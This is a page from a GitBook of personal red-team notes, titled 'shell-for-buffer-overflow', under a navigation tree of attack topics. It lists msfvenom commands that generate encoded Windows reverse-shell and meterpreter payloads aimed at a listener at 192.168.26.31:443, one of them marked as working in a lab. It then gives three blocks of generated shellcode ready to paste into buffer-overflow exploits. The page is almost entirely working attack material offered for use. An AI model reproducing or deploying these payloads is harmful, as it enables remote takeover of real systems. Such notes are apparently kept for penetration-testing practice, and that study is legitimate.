Red Team Notes
1.0.0
1.0.0
  • Introduction
  • PowerShell
    • find_files_by_name
    • powershell_web_access
    • enable_psremoting
    • powershell_sans_cheat
    • powerup_-_privilege_escalation
    • user_enumeration
    • powershell_-_quickies
    • constrained_language_breakout
    • powershell_-_get-system
    • domain_enumeration
    • powershell
    • random_powershell
  • mainframe
    • tso_commands
    • nmap_stuff_-_recon
  • Links and Random
    • Commands--mount-shares
    • Commands--responder
    • Commands--nac_testing
    • trash
    • Commands--nessus-openvas
    • Commands--named_pipes
    • ptx
    • Commands--mortar-shells
    • Redis-Cheatsheet
    • wifi_driver_stuff
    • bypassing_applocker_living_off_land
    • Commands--remote_and_local_file_inclusion
    • Commands--netcat-ftp
    • mimikatz
  • wifi-hacking
    • eaphammer
    • aircrack-ng_and_jtr_attack
    • new_page
    • cracking_wpa_attack
    • aircrack-ng
    • wifite
    • basics
    • hostapd
    • cowpatty_attack
    • rogue_access_point
    • cracking_wep_via_a_client_attack
    • handshake-via-pcap
    • clientless_wep_attack
    • fluxion
    • reaver
    • crack_wep
    • pyrit_attack
    • wep_shared_key_authentication_attack
  • mobile
    • qark
    • dex2jar
    • jd-gui
    • mobile
    • baby_steps
    • apktool
    • smali_and_baksmali
  • Cobalt-Strike
    • apache_rewrite_.htaccess
    • playbook
      • mail_and_smtp_enumeration-manipulation
      • lateral_movement
      • overpass_the_hash_with_rubeus-beacon_-_h
      • persistence
      • privilege_escalation
      • after_initial_access
    • situational_awareness_-_harmj0y
    • malleable
    • sid_hopping
    • generating_certificates
    • safety
    • random_commands
    • golden_ticket
    • go_daddy_domain
    • github_repos
    • malware_av_evasion
    • malware_av_evasion--main.go
    • c2_infrastructure
    • cobalt_strike_certificates
    • cpl_resource_runner_payload
  • Metasploit
    • nessus
    • network
    • meterpreter
  • Information Gathering Enumeration
    • 35 Searchsploit
    • 30 Find
    • 21 WinRM
    • 50 Gobuster
    • Enumeration by Port Number
    • 40 Active Directory
    • Linux Prevesc
    • pivoting
    • 20 Reconnoitre
    • Kerberos cheatsheet
    • 11 SMB Part 1
    • 00 ENUMERATION
    • 10 Nmap
    • 12-check-for-anonymous-smb
    • bruteforcing
    • 60 DNS Enumeration
    • 15 Firefox
  • Commands
    • rbash
    • tools-sources
    • tar
    • network-change-ip
    • sed_and_changing_files_for_malware_evasi
    • web_discovery
    • xxd
    • droopescan
    • c#
    • proxychains-admin-network
    • de-duplicate
    • privilege-escalation-windows_-_and_empir
    • ping_sweep
    • wget
    • snmp
    • custom-payloads
    • python
    • curl-wget
    • proxychains
    • goddi_-_domain_enumeration
    • nginx-bypass
    • outlook_and_owa
    • physical_hacking--rasperry_pi
    • have_a_shell
    • xml-xxe-xpath
    • xss-iframe
    • port-forward
    • physical_hacking
    • pack
    • client-side-iframe-attack
    • waf
    • laps
    • images-with-files-in-them
    • fresh-install
    • privilege-escalation-linux
    • masscan
    • arp-spoof
    • shellshock-squid
    • merlin
    • redis
    • get-browserdata
    • lateral_movement
    • smb-netbios-rpc
    • password-cracking
    • virtual-box_guest_additions
    • host_discovery-dns
    • certificate_tls_and_ssl
    • postgresql
    • physical_hacking--bash_bunny
    • powerview--new_page
    • mail_sniper
    • searchsploit
    • crackmapexec
    • user_agent
    • lolbins
    • files-inside-of-pictures
    • random_shellcode_-_scratch-pad
    • linux
    • ports
    • block-ip-iptables
    • httpscreenshot
    • dnscat
    • wp-scan
    • gather-gpp-creds
    • group-policy-decrypt-passwords
    • buffer-overflow
    • mac_address_change
    • sql
    • compiling-code
    • shell-for-buffer-overflow
    • hex_encode_command_line
    • spawn_a_better_shell_-_break_out_of_shit
    • nikto-proxy
    • osint
    • assembly
    • sshuttle
    • nmap_and_scanning
    • root_user_add
    • pass_the_hash
    • test-for-xxe
    • payloads
    • webdav
    • cut_commands
    • unicorn_scan
    • rdesktop_and_screen_for_linux
    • spooler_exploit
    • dns-zone-transfer
    • ssh
    • password-grep
  • reverse-shell-one-liners
    • ruby
    • c-language-reverse-shell
    • reverse_shell_one_liners
    • perl-reverse-shell-cgi-format
    • java_reverse_shell
    • python_reverse_shell
  • Bypass-Applocker
    • vbs_macro
    • pubprn.vbs
    • demiguise
    • mshta
    • regsvcs
    • regasm_2
    • bypass-uac
    • installutil
  • windows
    • uninstall_patches
    • passwords
    • powerview_3.0,_harmj0y
    • port_forward
    • powerview_acl_enum-abuse
    • powerview,_enumerate_groups-ac
    • search_4_loot
    • firewall
    • laps_abuse
    • enumeration
    • Windows
    • Windows_service_abuse
    • Windows Enumeration
  • mimikatz
    • mimikatz_list_modules
    • list_commands_in_module
    • mimikatz
    • remote_control_rpc
    • applocker_bypass_and_other_sn
    • mimikatz_-_start_and_stop_processes
    • base64_all_the_things
    • rdp
    • avoid_new_events
    • mimikatz_-_tokens
  • red-team
    • privilege_escalation_across_trusts
    • file_servers_and_files
    • lateral_movement
    • Commands--red_team
    • forest_enumeration
    • persistence_techniques
    • privilege_escalation
  • Start Procedure
    • Start-Procedure
  • Tools to add to Kali Linux
  • AD-notes
    • more-ad-notes
    • bloodhound
    • ad-notes-chirag
    • enumeration
    • pam_abuse
    • laps_abuse
    • domain_privilege_escalation
    • active_directory_one_liners
  • Setting up Kali Linux
    • Tools to add to Kali Linux
    • Items to Install in Kali
      • tmux
        • tmux_config
        • Setup_-_TMUX
        • tmux_cheat_sheet
      • crontab
      • rclone
      • Items_to_install_in_Kali
    • Tools to install
  • SQL
    • abusing_sql_server_trusts--privilege_escalation
    • abusing_sql_server_trusts
    • abusing_sql_server_trusts--post_exploitation_enumeration
    • 31 SQL
  • tools to install
  • command line
  • simple note
  • Enumeration
  • Tools to install on Windows
  • temp-readme
Powered by GitBook
On this page

Was this helpful?

  1. Commands

shell-for-buffer-overflow

SHELL-FOR-BUFFER-OVERFLOW

msfvenom -p windows/shell/reverse_tcp LHOST LPORT -f c -a x86 --platform windows -b "\x00 ** ALSO ADD OTHER BAD CHARACTERS HERE" -e x86/shikata_ga_nai

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.26.31 LPORT=443 -f c -a x86 --platform windows -b "\x00\x09\x0a\x0d" -e x86/shikata_ga_nai <---EXAMPLE OF WORKING SHELL FROM LAB

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.26.31 LPORT=443 -f c -a x86 --platform windows -b "\x00\x01\x04\x8e\xc3" -e x86/shikata_ga_nai

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.31 LPORT=443 -f c -a x86 --platform windows -b "\x00\x01\x04\x8e\xc3" -e x86/shikata_ga_nai

The following does give some kind of connection

shell = "\xbe\xbd\x10\xeb\xe2\xd9\xc7\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x4b\x31\x70\x15\x83\xe8\xfc\x03\x70\x11\xe2\x48\xec\x03\x60\xb2\x0d\xd4\x05\x3b\xe8\xe5\x05\x5f\x78\x55\xb6\x14\x2c\x5a\x3d\x78\xc5\xe9\x33\x54\xea\x5a\xf9\x82\xc5\x5b\x52\xf6\x44\xd8\xa9\x2a\xa7\xe1\x61\x3f\xa6\x26\x9f\xcd\xfa\xff\xeb\x63\xeb\x74\xa1\xbf\x80\xc7\x27\xc7\x75\x9f\x46\xe6\x2b\xab\x10\x28\xcd\x78\x29\x61\xd5\x9d\x14\x38\x6e\x55\xe2\xbb\xa6\xa7\x0b\x17\x87\x07\xfe\x66\xcf\xa0\xe1\x1d\x39\xd3\x9c\x25\xfe\xa9\x7a\xa0\xe5\x0a\x08\x12\xc2\xab\xdd\xc4\x81\xa0\xaa\x83\xce\xa4\x2d\x40\x65\xd0\xa6\x67\xaa\x50\xfc\x43\x6e\x38\xa6\xea\x37\xe4\x09\x13\x27\x47\xf5\xb1\x23\x6a\xe2\xc8\x69\xe3\xc7\xe0\x91\xf3\x4f\x73\xe1\xc1\xd0\x2f\x6d\x6a\x98\xe9\x6a\x8d\xb3\x4d\xe4\x70\x3c\xad\x2c\xb7\x68\xfd\x46\x1e\x11\x96\x96\x9f\xc4\x38\xc7\x0f\xb7\xf8\xb7\xef\x67\x90\xdd\xff\x58\x80\xdd\xd5\xf0\x2a\x27\xbe\x3e\x02\x3d\x21\xd7\x50\x42\x5c\x9c\xdd\xa4\x34\xf2\x8b\x7f\xa1\x6b\x96\xf4\x50\x73\x0d\x71\x52\xff\xa7\x85\x1d\x08\xc2\x95\x4a\x37\x2c\x66\x8b\x22\x2c\x0c\x8f\xe4\x7b\xb8\x8d\xd1\x4b\x67\x6d\x34\xc8\x60\x91\xc9\x27\x1b\xa4\x5f\xf7\x74\xc9\x8f\xf7\x84\x9f\xc5\xf7\xec\x47\xbe\xa4\x09\x88\x6b\xd9\x81\x1d\x94\x8b\x76\xb5\xfc\x31\xa0\xf1\xa2\xca\x87\x81\xa5\x34\x56\x45\x54\xf7\x8f\x8f\x22\x1e\x0c\xb4\x3d\x55\x31\x9d\xd7\x95\x65\xdd\xfd"

"\xb8\xb4\x48\xce\x84\xda\xda\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x4b\x31\x42\x15\x03\x42\x15\x83\xea\xfc\xe2\x41\xb4\x26\x06\xa9\x45\xb7\x67\x20\xa0\x86\xa7\x56\xa0\xb9\x17\x1d\xe4\x35\xd3\x73\x1d\xcd\x91\x5b\x12\x66\x1f\xbd\x1d\x77\x0c\xfd\x3c\xfb\x4f\xd1\x9e\xc2\x9f\x24\xde\x03\xfd\xc4\xb2\xdc\x89\x7a\x23\x68\xc7\x46\xc8\x22\xc9\xce\x2d\xf2\xe8\xff\xe3\x88\xb2\xdf\x02\x5c\xcf\x56\x1d\x81\xea\x21\x96\x71\x80\xb0\x7e\x48\x69\x1e\xbf\x64\x98\x5f\x87\x43\x43\x2a\xf1\xb7\xfe\x2c\xc6\xca\x24\xb9\xdd\x6d\xae\x19\x3a\x8f\x63\xff\xc9\x83\xc8\x74\x95\x87\xcf\x59\xad\xbc\x44\x5c\x62\x35\x1e\x7a\xa6\x1d\xc4\xe3\xff\xfb\xab\x1c\x1f\xa4\x14\xb8\x6b\x49\x40\xb1\x31\x06\xa5\xfb\xc9\xd6\xa1\x8c\xba\xe4\x6e\x26\x55\x45\xe6\xe0\xa2\xaa\xdd\x54\x3c\x55\xde\xa4\x14\x92\x8a\xf4\x0e\x33\xb3\x9f\xce\xbc\x66\x0f\x9f\x12\xd9\xef\x4f\xd3\x89\x87\x85\xdc\xf6\xb7\xa5\x36\x9f\x5d\x5f\xd1\x60\x09\x45\x3e\x09\x4b\x7a\x41\x72\xc2\x9c\x2b\x94\x82\x37\xc4\x0d\x8f\xcc\x75\xd1\x1a\xa9\xb6\x59\xae\x4d\x78\xaa\xdb\x5d\x6d\x95\x23\x9e\x6e\x80\x23\xf4\x6a\x02\x74\x60\x71\x73\xb2\x2f\x8a\x56\xc1\x28\x74\x27\x2c\x43\x43\xbd\xee\x3c\xac\x51\xee\xbc\xfa\x3b\xee\xd4\x5a\x18\xbd\xc1\xa4\xb5\xd2\x59\x31\x36\x82\x0e\x92\x5e\x28\x68\xd4\xc0\xd3\x5f\x66\x06\x2b\x1e\xaa\xf6\xe8\xf7\xea\x8c\x07\xc4\x48\x9e\x62\x69\xf8\x35\x8c\x3d\xfa\x1f"

meterpreter

"\xb8\x20\xa5\xfd\x1e\xda\xde\xd9\x74\x24\xf4\x5a\x33\xc9\xb1\x4b\x83\xea\xfc\x31\x42\x11\x03\x42\x11\xe2\xd5\x59\x15\x9c\x15\xa2\xe6\xc1\x9c\x47\xd7\xc1\xfa\x0c\x48\xf2\x89\x41\x65\x79\xdf\x71\xfe\x0f\xf7\x76\xb7\xba\x21\xb8\x48\x96\x11\xdb\xca\xe5\x45\x3b\xf2\x25\x98\x3a\x33\x5b\x50\x6e\xec\x17\xc6\x9f\x99\x62\xda\x14\xd1\x63\x5a\xc8\xa2\x82\x4b\x5f\xb8\xdc\x4b\x61\x6d\x55\xc2\x79\x72\x50\x9d\xf2\x40\x2e\x1c\xd3\x98\xcf\xb2\x1a\x15\x22\xcb\x5b\x92\xdd\xbe\x95\xe0\x60\xb8\x61\x9a\xbe\x4d\x72\x3c\x34\xf5\x5e\xbc\x99\x63\x14\xb2\x56\xe0\x72\xd7\x69\x25\x09\xe3\xe2\xc8\xde\x65\xb0\xee\xfa\x2e\x62\x8f\x5b\x8b\xc5\xb0\xbc\x74\xb9\x14\xb6\x99\xae\x25\x95\xf5\x03\x07\x26\x06\x0c\x10\x55\x34\x93\x8a\xf1\x74\x5c\x14\x05\x7a\x77\xe0\x99\x85\x78\x10\xb3\x41\x2c\x40\xab\x60\x4d\x0b\x2b\x8c\x98\x9b\x7b\x22\x73\x5b\x2c\x82\x23\x33\x26\x0d\x1b\x23\x49\xc7\x34\xc9\xb3\x80\xfa\xa5\xa6\x4f\x93\xb7\xd6\x6e\xd8\x3e\x30\x1a\x0e\x16\xea\xb3\xb7\x33\x60\x25\x37\xee\x0c\x65\xb3\x1a\xf0\x28\x34\x6f\xe2\x5d\x7b\x8f\xfa\x9d\xee\x8f\x90\x99\xb8\xd8\x0c\xa0\x9d\x2e\x93\x5b\xc8\x2d\xd4\xa4\x8d\xd8\xae\x93\x1b\x5a\xd9\xdb\xcb\x5a\x19\x8a\x81\x5a\x71\x6a\xf2\x09\x64\x75\x2f\x3e\x35\xe0\xd0\x16\xe9\xa3\xb8\x94\xd4\x84\x66\x67\x33\x97\x61\x97\xc2\x5b\x90\x54\x13\x9a\xe6\xb3\xa7\x99\xf9\xf6\x8a\x88\x93\xf8\x99\xcb\xb1"

Previouscompiling-codeNexthex_encode_command_line

Last updated 3 years ago

Was this helpful?